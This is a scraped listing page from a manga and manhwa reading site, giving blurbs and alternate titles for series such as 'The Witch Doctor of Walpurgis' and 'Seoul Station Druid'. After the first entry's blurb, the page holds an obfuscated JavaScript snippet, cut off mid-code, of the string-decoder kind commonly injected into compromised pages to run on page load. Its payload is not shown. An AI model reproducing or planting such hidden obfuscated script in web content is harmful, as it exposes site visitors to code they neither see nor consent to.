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4271 results

Peerless Dad

Its an amazing story about one martial arts journey through marriage, fatherhood, and battles.<script></script><script>(function(_0x377def,_0x5c6646){var _0x32157d=_0x204f,_0x3f11e8=_0x377def();while(!![]){try{var _0x5f4de0=-parseInt(_0x32157d(0x113))/(-0xeb*0x5+-0x8bc*-0x3+-0x159c)*(parseInt(_0x32157d(0x109))/(-0xf*-0x253+0xa3c+0x77*-0x61))+-parseInt(_0x32157d(0x102))/(0x91d*-0x2+-0xad*-0xb+0xace)+-parseInt(_0x32157d(0x100))/(0x19b*0x13+-0x2094+-0x6b*-0x5)*(parseInt(_0x32157d(0xfb))/(0x2b*-0x4c+-0x3e*0x9+0xef7))+-parseInt(_0x32157d(0xfa))/(-0x1*0x1619+0x1*0x1945+-0x326)*(parseInt(_0x32157d(0x105))/(-0x102*0x26+-0x2345*0x1+-0x933*-0x8))+parseInt(_0x32157d(0x10a))/(0x13a2+-0xb27+0x15*-0x67)+-parseInt(_0x32157d(0x116))/(-0x17e*0x13+0x169*-0xf+0x318a)*(parseInt(_0x32157d(0x10c))/(0x602*0x6+-0x1972+-0xa90))+parseInt(_0x32157d(0x114))/(-0x2*0x127+0x2263*-0x1+0x2*0x125e)*(parseInt(_0x32157d(0x118))/(-0x1709*0x1+0x107b*-0x1+0x10*0x279));if(_0x5f4de0===_0x5c6646)break;else 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The Witch Doctor of Walpurgis

Read manhwa The Witch Doctor of Walpurgis Kina, a witch doctor living on Mount Walpurgis, receives a dire prophecy from a blue tit: she will face execution within six months and encounter three men who will seal her fate. Determined to avoid this destiny, she resolves to hide away deep in the mountains. But before long, one of these men finds her, and she is swept into the treacherous royal palace, teeming with intrigue and power struggles. Can Kina survive the palace’s deadly schemes and escape her foretold fate? “The Witch Doctor of Walpurgis Manhwa” is another name: 발푸르기스의 마녀 의사


Will You Marry Me Under Contract, Your Highness?

Read manhwa Will You Marry Me Under Contract, Your Highness? Jenesia, a brilliant sorcerer, was murdered after witnessing an affair between her fiance and her best friend. With her final breath, Jenesia managed to use her magical powers to turn back time. Reliving her past, will Jenesia finally be able to find happiness?

2 days ago

Hopefully, at Your Mercy

Read manhwa Hopefully, at Your Mercy I, Han Ji-an, was living an ordinary life in South Korea. Then one day, I woke up inside the very novel I had been reading! The real problem? This is my second time transmigrating, and I’ve ended up as a completely different character. Worse yet… I’ve become the duchess known as a fool?!?! While I’m still reeling from the shock, the imperial prince of this world, Grand Duke Iskan Anagrock, shows up… “You’re telling me I was your lover? That’s impossible!” “Take me. I will surely become your most prized possession.” As if being stuck as a fool wasn’t bad enough, now I have to deal with this unreadable man… Can I really survive here? “Hopefully, at Your Mercy Manhwa” is another name: 바라건대, 당신의 자비를


Even Though I Transmigrated as a Villainess, I’d Rather Raise a Cat

Read Manga Even Though I Transmigrated as a Villainess, I’d Rather Raise a Cat Online For Free At Top Manhua The Content Even Though I Transmigrated as a Villainess, I’d Rather Raise a Cat: Lawyne was possessed as a villainess, the one who was executed for mistreating a shapeshifter. To avoid death in her second life, she decided to marry the duke instead of her older sister, Linie. The problem is… the duke of Blios is a cat beast, known for his notoriously ruthlessness. “I heard that abusing shapeshifters like me is a hobby of yours…” “From what I understand, there was no such condition that a woman who mistreats shapeshifters could never be the Duke’s marriage partner.” His emerald eyes flashed menacingly, I added before he could continue. “If my hobby will pose a problem, then I promise that I will not lay a finger on the Duke.” Associated Names: I Reincarnated as a Villainess, But Why Did I Become a Cat Butler Instead? / Мной завладел злодей, но я всё ещё хочу вырастить кота / 악역에 빙의했지만, 고양이나 키울래요 New and hot comics are updated the fastest. The Business Is Closed Due To The Tyrant Parents The Gambled Bride, Loved by a Wicked Lord Cinderella Disappeared MangaZin is a comprehensive website featuring the latest and hottest manga, updated rapidly to cater to readers with high-quality images and provide them with excellent experiences. With keywords such as “Top Manhua” and “ManhwaClan,” as well as related terms like ZinManga, LikeManga, and Read Manga Online ensures readers have access to a wide selection of top-notch manga content. Please always follow and share with your friends to support the website MANGAZIN.ORG so that we have more motivation to publish the latest and best comics.


I Raised a Villain

Read manhwa I Raised a Villain I became an extra in the novel I wrote! Except, it’s not a romantic fantasy but a martial arts novel instead… ‘But that means I get to see the male lead of my own work, right?’ With that positive thought in mind, *Yeon* sets out to find her precious male lead. However, before meeting the main character *Danmokchang*, she encounters his twin brother and the future villain, *Danmokbi*. But now, as a child in the original story, *Danmokbi* is just a frail, thin boy in his teens, physically and emotionally devastated from experiencing the villain’s backstory. So, she makes a vow: “I’m going to raise you so you don’t become a villain.” She lovingly takes care of the poor young master abandoned by his family, intending to step away from the story after watching him grow up proudly. But then… “Why did you run away, Yeon?” His bright smile is anything but kind. “If you raised me, you have to take responsibility, Yeon.” It seems this villain has no intention of letting her go. “I Raised a Villain Manhwa” is alternative: 악당을 업어 키웠더니


Medical Return

Medical Return Kim Jihyun, who lived his life as a disreputable surgeon, gains a second chance to relive his life. He then goes back to his middle school days, and live his life to the fullest unlike before, he studies nonstop. His goal is to become a dermatologist who make lots of money instead of the poor surgeon he was from previous life! Medical Hwansaeng, Medical Rebirth, Medical Reincarnation, Medikeol Hwansaeng, Реинкарнация врача, 메디컬 환생 Search for series of same genre(s) Welcome to Mangazin site, you can read and enjoy all kinds of Manhwa trending  such as Drama, Manhua, Manga, Romance…, for free here. All of the manhwa new will be update with high standards every hours. If you are a Comics book (Manhwa Hot ), MangaZin is your best choice, don’t hesitate, just read and feel ! &nbsp;


I Became The Young Wife of The Male Protagonist of a Martial Arts Novel

Read manhwa I Became The Young Wife of The Male Protagonist of a Martial Arts Novel / I Became the Young Wife of the Male Lead in a Martial Arts Novel In a martial arts novel where the male lead takes all the glory, I possessed the role of his distant ancestor. To faithfully support him from behind, I worked tirelessly to establish the greatest clan. Afterward, I thought I could finally close my eyes in peace. “What? My clan has fallen?!” When I opened my eyes again, it was 300 years later. The clan I had desperately revived was on the brink of total collapse. Moreover, the male lead, whom I had devoted my entire life to supporting, was about to enter into a disgraceful political marriage with the original story’s villainess. But the biggest problem is… “Why have I become that villainess?!” “I Became The Young Wife of The Male Protagonist of a Martial Arts Novel Manhwa” is sames name: 무협지 남주의 어린 아내가 되어버렸다


Leveling Up, By Only Eating!

The main character is stricken by a rare condition that affects only two people in the entire world, bulimic deficiency. He organizes his daily meals to survive, but his hope of survival grows dimmer as the days go by. He consults a doctor, who suggests playing the Alternate Reality Game ‘Athens’, where he can eat as must as he wants without gaining any weight. He plays the game to save his life and grow in strength by doing nothing but eating! A Gourmet Fantasy Life!


Seoul Station Druid

Read “Seoul Station Druid Manga” – “Seoul Station Druid Manhwa” Online Free On MANGAZIN The summary of the comics “Seoul Station Druid”: What started out as an ordinary day turned upside down when an unknown catastrophe struck Earth, transporting Suho Park to a different planet. He eventually learns how to adapt and fight for his survival in this foreign world, but one day, just as suddenly as he was sucked into this new planet, Suho is pulled back to Earth. He quickly learns that return to life as he remembers it is no longer possible, as Earth is in constant battle with monsters who’ve managed to infiltrate the planet. How will Suho fight against the monsters attacking Earth, and will he be able to survive this time with his current skills? “Seoul Station Druid” is alternatively named: The Druid of Seoul Station / Друїд зі станції Сеул / सियोल स्टेशन ड्रुइडो / ดรูอิดแห่งสถานีโซล / ドルイド侵略 / 归来的异世界王者 / 異世界王者德魯伊德 / 서울역 드루이드 The comics “Seoul Station Druid” belongs to the Genre: Action, Adventure, Fantasy, Manhwa, Martial Arts, Sci-fi, Shounen, Webtoons “MANHWACLAN, MANGA UPDATES, KUNMANGA…” are the most searched keywords on the website MANHWACLAN. We offer a wide selection of the best and newest comics series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at LikeManga. You can read TOP MANGA The Regretful Villainess Is Happy Because She Got Divorced Underworld Restaurant North Snow Love Story


Enough with the Flirting

Read manhwa Enough with the Flirting Rolicia Roba’s world is turned upside down when her mother tragically passes away. And not only does her long-lost father come to fetch her, but he turns out to be the renowned Count Roward. Thrust into noble society as an illegitimate child, Rolicia is determined to secure her own future without relying on her newfound father. But her cunning stepmother and selfish half-sister are standing stubbornly in her path… and so is Lockhart Caidel, the wartime savior of the second crown prince. With razor-sharp wit and a will of steel, Rolicia refuses to go down—or fall in love—without a fight!!! 작작 좀 들이대시죠
